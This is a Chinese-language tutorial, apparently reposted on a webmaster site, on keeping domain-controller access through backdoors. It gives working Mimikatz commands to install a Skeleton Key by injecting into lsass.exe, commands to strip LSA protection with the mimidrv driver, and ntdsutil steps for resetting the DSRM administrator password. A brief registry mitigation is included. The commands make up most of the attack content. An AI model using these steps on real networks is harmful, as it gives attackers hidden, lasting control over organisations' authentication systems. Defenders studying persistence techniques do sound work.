常见域后门技术总结与解析利用

当获取到域控的权限后，为了防止对域控权限的丢失，hacker 也会使用一些技术来维持已获取到的域权限。因此，本文对常见的域后门技术进行了总结并对其利用方式进行了详细的说明，希望可以对大家的学习提供一些帮助。

0x01 创建 Skeleton Key 域后门

Skeleton Key 即 “万能钥匙”。通过在域控上安装 Skeleton Key，所有域用户账户都可以使用一个相同的密码进行认证，同时原有密码仍然有效。

该技术通过注入 lsass.exe 进程实现，并且创建的 Skeleton Key 只是保存在内存中，域控只要重启，Skeleton Key 就会失效。

注意：利用该技术需要拥有域管理员的权限

1. 常规利用

将 Mimikatz 上传到域控制器，执行以下命令：

mimikatz.exe "privilege::debug" "misc::skeleton" exit

执行后，将成功创建 Skeleton Key 域后门，为所有的域账户设置一个相同的密码 “mimikatz”，从而使其他机器可以成功登录域控。

2. 缓解措施

微软在 2014 年 3 月添加了 LSA（Local Security Authority，本地安全机构）保护策略，用来防止对 lsass.exe 进程的内存读取和代码注入。通过执行以下命令，可以开启或关闭 LSA 保护。

复制

# 开启 LSA 保护策略

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f

# 关闭 LSA 保护策略

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL

开启LSA 保护策略并重启系统后，Mimikatz 的相关操作都会失败。此时即使已经获取了 Debug 权限也无法读取用户哈希值，更无法安装 Skeleton Key。

不过，Mimikatz 可以绕过 LSA 保护。该功能需要 Minikatz 项目中的 mimidrv.sys 驱动文件，相应的 Skeleton Key 安装命令也变为了如下：

mimikatz # privilege::debug

mimikatz # !+

mimikatz # !processprotect /process:lsass.exe /remove

mimikatz # misc::skeleton

0x02 创建 DSRM 域后门

DSRM（Directory Services Restore Mode，目录服务还原模式）是域控的安全模式启动选项，用于使服务器脱机，以进行紧急维护。在初期安装 Windows 域服务时，安装向导会提示用户设置 DSRM 的管理员密码。有了该密码后，网络管理员可以在后期域控发生问题时修复、还原或重建活动目录数据库。

在域控上，DSRM 账户实际上就是本地管理员账户（Administrator），并且该账户的密码在创建后几乎很少使用。通过在域控上运行 NTDSUtil，可以为 DSRM 账户修改密码，相关命令如下：

# 进入 ntdsutil

ntdsutil

# 进入设置 DSRM 账户密码设置模式

set dsrm password

# 在当前域控上恢复 DSRM 密码

reset password on server null

# 输入新密码 123456Lhz！

<password>

# 再次输入新密码

<password>

# 退出 DSRM 密码设置模式

q

# 退出 ntdsutil

hacker 可以通过修改 DSRM 账户的密码，以维持对域控的权限。

（编辑：银川站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!